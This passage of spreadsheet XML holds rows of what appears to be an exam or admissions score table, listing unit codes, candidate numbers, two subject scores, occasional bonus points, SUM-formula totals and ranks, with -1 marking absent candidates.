      <c r="F348" s="8" t="n">
        <v>68.2</v>
      </c>
      <c r="G348" s="11"/>
      <c r="H348" s="8" t="n">
        <f aca="false">SUM(E348:G348)</f>
        <v>123</v>
      </c>
      <c r="I348" s="9" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="349" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A349" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B349" s="8" t="n">
        <v>1314011301</v>
      </c>
      <c r="C349" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D349" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E349" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F349" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G349" s="11"/>
      <c r="H349" s="8" t="n">
        <f aca="false">SUM(E349:G349)</f>
        <v>123</v>
      </c>
      <c r="I349" s="9" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="350" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A350" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B350" s="8" t="n">
        <v>1314011305</v>
      </c>
      <c r="C350" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D350" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E350" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F350" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="G350" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H350" s="8" t="n">
        <f aca="false">SUM(E350:G350)</f>
        <v>121.2</v>
      </c>
      <c r="I350" s="9" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="351" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A351" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B351" s="8" t="n">
        <v>1314011219</v>
      </c>
      <c r="C351" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D351" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E351" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F351" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G351" s="11"/>
      <c r="H351" s="8" t="n">
        <f aca="false">SUM(E351:G351)</f>
        <v>120.4</v>
      </c>
      <c r="I351" s="9" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="352" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A352" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B352" s="8" t="n">
        <v>1314011217</v>
      </c>
      <c r="C352" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D352" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E352" s="8" t="n">
        <v>52</v>
      </c>
      <c r="F352" s="8" t="n">
        <v>67.2</v>
      </c>
      <c r="G352" s="11"/>
      <c r="H352" s="8" t="n">
        <f aca="false">SUM(E352:G352)</f>
        <v>119.2</v>
      </c>
      <c r="I352" s="9" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="353" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A353" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B353" s="8" t="n">
        <v>1314011312</v>
      </c>
      <c r="C353" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D353" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E353" s="8" t="n">
        <v>57.2</v>
      </c>
      <c r="F353" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G353" s="11"/>
      <c r="H353" s="8" t="n">
        <f aca="false">SUM(E353:G353)</f>
        <v>119.2</v>
      </c>
      <c r="I353" s="9" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="354" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A354" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B354" s="8" t="n">
        <v>1314011216</v>
      </c>
      <c r="C354" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D354" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E354" s="8" t="n">
        <v>57.6</v>
      </c>
      <c r="F354" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G354" s="11"/>
      <c r="H354" s="8" t="n">
        <f aca="false">SUM(E354:G354)</f>
        <v>118.8</v>
      </c>
      <c r="I354" s="9" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="355" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A355" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B355" s="8" t="n">
        <v>1314011223</v>
      </c>
      <c r="C355" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D355" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E355" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F355" s="8" t="n">
        <v>60.6</v>
      </c>
      <c r="G355" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H355" s="8" t="n">
        <f aca="false">SUM(E355:G355)</f>
        <v>118.8</v>
      </c>
      <c r="I355" s="9" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="356" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A356" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B356" s="8" t="n">
        <v>1314011222</v>
      </c>
      <c r="C356" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D356" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E356" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="F356" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G356" s="11"/>
      <c r="H356" s="8" t="n">
        <f aca="false">SUM(E356:G356)</f>
        <v>115.8</v>
      </c>
      <c r="I356" s="9" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="357" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A357" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B357" s="8" t="n">
        <v>1314011302</v>
      </c>
      <c r="C357" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D357" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E357" s="8" t="n">
        <v>49.8</v>
      </c>
      <c r="F357" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G357" s="11"/>
      <c r="H357" s="8" t="n">
        <f aca="false">SUM(E357:G357)</f>
        <v>113.8</v>
      </c>
      <c r="I357" s="9" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="358" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A358" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B358" s="8" t="n">
        <v>1314011224</v>
      </c>
      <c r="C358" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D358" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E358" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F358" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G358" s="9" t="n">
        <v>3</v>
      </c>
      <c r="H358" s="8" t="n">
        <f aca="false">SUM(E358:G358)</f>
        <v>113.4</v>
      </c>
      <c r="I358" s="9" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="359" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A359" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B359" s="8" t="n">
        <v>1314011225</v>
      </c>
      <c r="C359" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D359" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E359" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F359" s="8" t="n">
        <v>63.6</v>
      </c>
      <c r="G359" s="11"/>
      <c r="H359" s="8" t="n">
        <f aca="false">SUM(E359:G359)</f>
        <v>112.2</v>
      </c>
      <c r="I359" s="9" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="360" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A360" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B360" s="8" t="n">
        <v>1314011304</v>
      </c>
      <c r="C360" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D360" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E360" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F360" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G360" s="11"/>
      <c r="H360" s="8" t="n">
        <f aca="false">SUM(E360:G360)</f>
        <v>111.8</v>
      </c>
      <c r="I360" s="9" t="n">
        <v>25</v>
      </c>
    </row>
    <row r="361" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A361" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B361" s="8" t="n">
        <v>1314011311</v>
      </c>
      <c r="C361" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D361" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E361" s="8" t="n">
        <v>48.4</v>
      </c>
      <c r="F361" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G361" s="11"/>
      <c r="H361" s="8" t="n">
        <f aca="false">SUM(E361:G361)</f>
        <v>108.4</v>
      </c>
      <c r="I361" s="9" t="n">
        <v>26</v>
      </c>
    </row>
    <row r="362" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A362" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B362" s="8" t="n">
        <v>1314011303</v>
      </c>
      <c r="C362" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D362" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E362" s="8" t="n">
        <v>42.6</v>
      </c>
      <c r="F362" s="8" t="n">
        <v>65.4</v>
      </c>
      <c r="G362" s="11"/>
      <c r="H362" s="8" t="n">
        <f aca="false">SUM(E362:G362)</f>
        <v>108</v>
      </c>
      <c r="I362" s="9" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="363" s="13" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A363" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B363" s="8" t="n">
        <v>1314011310</v>
      </c>
      <c r="C363" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D363" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E363" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F363" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G363" s="11"/>
      <c r="H363" s="8" t="n">
        <f aca="false">SUM(E363:G363)</f>
        <v>107.8</v>
      </c>
      <c r="I363" s="9" t="n">
        <v>28</v>
      </c>
    </row>
    <row r="364" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A364" s="9" t="n">
        <v>4300073</v>
      </c>
      <c r="B364" s="8" t="n">
        <v>1314011215</v>
      </c>
      <c r="C364" s="11" t="s">
        <v>138</v>
      </c>
      <c r="D364" s="11" t="s">
        <v>133</v>
      </c>
      <c r="E364" s="8" t="n">
        <v>47</v>
      </c>
      <c r="F364" s="8" t="n">
        <v>58.8</v>
      </c>
      <c r="G364" s="11"/>
      <c r="H364" s="8" t="n">
        <f aca="false">SUM(E364:G364)</f>
        <v>105.8</v>
      </c>
      <c r="I364" s="9" t="n">
        <v>29</v>
      </c>
    </row>
    <row r="365" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A365" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B365" s="8" t="n">
        <v>1314011318</v>
      </c>
      <c r="C365" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D365" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E365" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="F365" s="8" t="n">
        <v>70.6</v>
      </c>
      <c r="G365" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H365" s="8" t="n">
        <f aca="false">SUM(E365:G365)</f>
        <v>135</v>
      </c>
      <c r="I365" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="366" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A366" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B366" s="8" t="n">
        <v>1314011313</v>
      </c>
      <c r="C366" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D366" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E366" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="F366" s="8" t="n">
        <v>69</v>
      </c>
      <c r="G366" s="8"/>
      <c r="H366" s="8" t="n">
        <f aca="false">SUM(E366:G366)</f>
        <v>133.2</v>
      </c>
      <c r="I366" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="367" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A367" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B367" s="8" t="n">
        <v>1314011321</v>
      </c>
      <c r="C367" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D367" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E367" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="F367" s="8" t="n">
        <v>68.8</v>
      </c>
      <c r="G367" s="8"/>
      <c r="H367" s="8" t="n">
        <f aca="false">SUM(E367:G367)</f>
        <v>128.4</v>
      </c>
      <c r="I367" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="368" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A368" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B368" s="8" t="n">
        <v>1314011319</v>
      </c>
      <c r="C368" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D368" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E368" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F368" s="8" t="n">
        <v>71.4</v>
      </c>
      <c r="G368" s="8"/>
      <c r="H368" s="8" t="n">
        <f aca="false">SUM(E368:G368)</f>
        <v>126.2</v>
      </c>
      <c r="I368" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="369" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A369" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B369" s="8" t="n">
        <v>1314011317</v>
      </c>
      <c r="C369" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D369" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E369" s="8" t="n">
        <v>56</v>
      </c>
      <c r="F369" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="G369" s="8"/>
      <c r="H369" s="8" t="n">
        <f aca="false">SUM(E369:G369)</f>
        <v>123.6</v>
      </c>
      <c r="I369" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="370" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A370" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B370" s="8" t="n">
        <v>1314011315</v>
      </c>
      <c r="C370" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D370" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E370" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="F370" s="8" t="n">
        <v>69</v>
      </c>
      <c r="G370" s="8"/>
      <c r="H370" s="8" t="n">
        <f aca="false">SUM(E370:G370)</f>
        <v>123.2</v>
      </c>
      <c r="I370" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="371" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A371" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B371" s="8" t="n">
        <v>1314011316</v>
      </c>
      <c r="C371" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D371" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E371" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F371" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="G371" s="8"/>
      <c r="H371" s="8" t="n">
        <f aca="false">SUM(E371:G371)</f>
        <v>122</v>
      </c>
      <c r="I371" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="372" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A372" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B372" s="8" t="n">
        <v>1314011320</v>
      </c>
      <c r="C372" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D372" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E372" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="F372" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="G372" s="8"/>
      <c r="H372" s="8" t="n">
        <f aca="false">SUM(E372:G372)</f>
        <v>119</v>
      </c>
      <c r="I372" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="373" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A373" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B373" s="8" t="n">
        <v>1314011314</v>
      </c>
      <c r="C373" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D373" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E373" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F373" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G373" s="8"/>
      <c r="H373" s="8" t="n">
        <f aca="false">SUM(E373:G373)</f>
        <v>115.6</v>
      </c>
      <c r="I373" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="374" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A374" s="9" t="n">
        <v>4300075</v>
      </c>
      <c r="B374" s="8" t="n">
        <v>1314011322</v>
      </c>
      <c r="C374" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D374" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E374" s="8" t="n">
        <v>46</v>
      </c>
      <c r="F374" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G374" s="8"/>
      <c r="H374" s="8" t="n">
        <f aca="false">SUM(E374:G374)</f>
        <v>112</v>
      </c>
      <c r="I374" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="375" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A375" s="9" t="n">
        <v>4300077</v>
      </c>
      <c r="B375" s="8" t="n">
        <v>1314011323</v>
      </c>
      <c r="C375" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D375" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E375" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F375" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G375" s="8"/>
      <c r="H375" s="8" t="n">
        <f aca="false">SUM(E375:G375)</f>
        <v>118</v>
      </c>
      <c r="I375" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="376" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A376" s="9" t="n">
        <v>4300077</v>
      </c>
      <c r="B376" s="8" t="n">
        <v>1314011325</v>
      </c>
      <c r="C376" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D376" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E376" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F376" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="G376" s="8"/>
      <c r="H376" s="8" t="n">
        <f aca="false">SUM(E376:G376)</f>
        <v>110</v>
      </c>
      <c r="I376" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="377" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A377" s="9" t="n">
        <v>4300077</v>
      </c>
      <c r="B377" s="8" t="n">
        <v>1314011327</v>
      </c>
      <c r="C377" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D377" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E377" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F377" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="G377" s="8"/>
      <c r="H377" s="8" t="n">
        <f aca="false">SUM(E377:G377)</f>
        <v>109.6</v>
      </c>
      <c r="I377" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="378" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A378" s="9" t="n">
        <v>4300077</v>
      </c>
      <c r="B378" s="8" t="n">
        <v>1314011324</v>
      </c>
      <c r="C378" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D378" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E378" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F378" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G378" s="8"/>
      <c r="H378" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I378" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="379" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A379" s="9" t="n">
        <v>4300077</v>
      </c>
      <c r="B379" s="8" t="n">
        <v>1314011326</v>
      </c>
      <c r="C379" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D379" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E379" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F379" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G379" s="8"/>
      <c r="H379" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I379" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="380" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A380" s="9" t="n">
        <v>4300078</v>
      </c>
      <c r="B380" s="8" t="n">
        <v>1314011401</v>
      </c>
      <c r="C380" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D380" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E380" s="8" t="n">
        <v>59.2</v>
      </c>
      <c r="F380" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G380" s="8"/>
      <c r="H380" s="8" t="n">
        <f aca="false">SUM(E380:G380)</f>
        <v>125.8</v>
      </c>
      <c r="I380" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="381" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A381" s="9" t="n">
        <v>4300078</v>
      </c>
      <c r="B381" s="8" t="n">
        <v>1314011402</v>
      </c>
      <c r="C381" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D381" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E381" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F381" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="G381" s="8"/>
      <c r="H381" s="8" t="n">
        <f aca="false">SUM(E381:G381)</f>
        <v>115.4</v>
      </c>
      <c r="I381" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="382" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A382" s="9" t="n">
        <v>4300078</v>
      </c>
      <c r="B382" s="8" t="n">
        <v>1314011329</v>
      </c>
      <c r="C382" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D382" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E382" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="F382" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G382" s="8"/>
      <c r="H382" s="8" t="n">
        <f aca="false">SUM(E382:G382)</f>
        <v>101.6</v>
      </c>
      <c r="I382" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="383" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A383" s="9" t="n">
        <v>4300078</v>
      </c>
      <c r="B383" s="8" t="n">
        <v>1314011330</v>
      </c>
      <c r="C383" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D383" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E383" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F383" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="G383" s="8"/>
      <c r="H383" s="8" t="n">
        <f aca="false">SUM(E383:G383)</f>
        <v>99.4</v>
      </c>
      <c r="I383" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="384" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A384" s="9" t="n">
        <v>4300078</v>
      </c>
      <c r="B384" s="8" t="n">
        <v>1314011328</v>
      </c>
      <c r="C384" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D384" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E384" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F384" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G384" s="8"/>
      <c r="H384" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I384" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="385" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A385" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B385" s="8" t="n">
        <v>1314011509</v>
      </c>
      <c r="C385" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D385" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E385" s="8" t="n">
        <v>68.4</v>
      </c>
      <c r="F385" s="8" t="n">
        <v>72.2</v>
      </c>
      <c r="G385" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H385" s="8" t="n">
        <f aca="false">SUM(E385:G385)</f>
        <v>143.6</v>
      </c>
      <c r="I385" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="386" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A386" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B386" s="8" t="n">
        <v>1314011602</v>
      </c>
      <c r="C386" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D386" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E386" s="8" t="n">
        <v>69</v>
      </c>
      <c r="F386" s="8" t="n">
        <v>73.4</v>
      </c>
      <c r="G386" s="8"/>
      <c r="H386" s="8" t="n">
        <f aca="false">SUM(E386:G386)</f>
        <v>142.4</v>
      </c>
      <c r="I386" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="387" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A387" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B387" s="8" t="n">
        <v>1314011604</v>
      </c>
      <c r="C387" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D387" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E387" s="8" t="n">
        <v>73.4</v>
      </c>
      <c r="F387" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="G387" s="8"/>
      <c r="H387" s="8" t="n">
        <f aca="false">SUM(E387:G387)</f>
        <v>139.6</v>
      </c>
      <c r="I387" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="388" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A388" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B388" s="8" t="n">
        <v>1314011613</v>
      </c>
      <c r="C388" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D388" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E388" s="8" t="n">
        <v>65.4</v>
      </c>
      <c r="F388" s="8" t="n">
        <v>73.4</v>
      </c>
      <c r="G388" s="8"/>
      <c r="H388" s="8" t="n">
        <f aca="false">SUM(E388:G388)</f>
        <v>138.8</v>
      </c>
      <c r="I388" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="389" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A389" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B389" s="8" t="n">
        <v>1314011616</v>
      </c>
      <c r="C389" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D389" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E389" s="8" t="n">
        <v>69.2</v>
      </c>
      <c r="F389" s="8" t="n">
        <v>69.4</v>
      </c>
      <c r="G389" s="8"/>
      <c r="H389" s="8" t="n">
        <f aca="false">SUM(E389:G389)</f>
        <v>138.6</v>
      </c>
      <c r="I389" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="390" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A390" s="9" t="n">
        <v>4300079</v>
      </c>
      <c r="B390" s="8" t="n">
        <v>1314011426</v>
      </c>
      <c r="C390" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D390" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E390" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="F390" s="8" t="n">
        <v>72</v>
      </c>
      <c r="G390" s="8"/>
      <c r="H390" s="8" t="n">
        <f aca="false">SUM(E390:G390)</f>
        <v>138.2</v>
      </c>
      <c r="I390" s="8" t="n">
        <v>6</v>
      </c>
    </row>
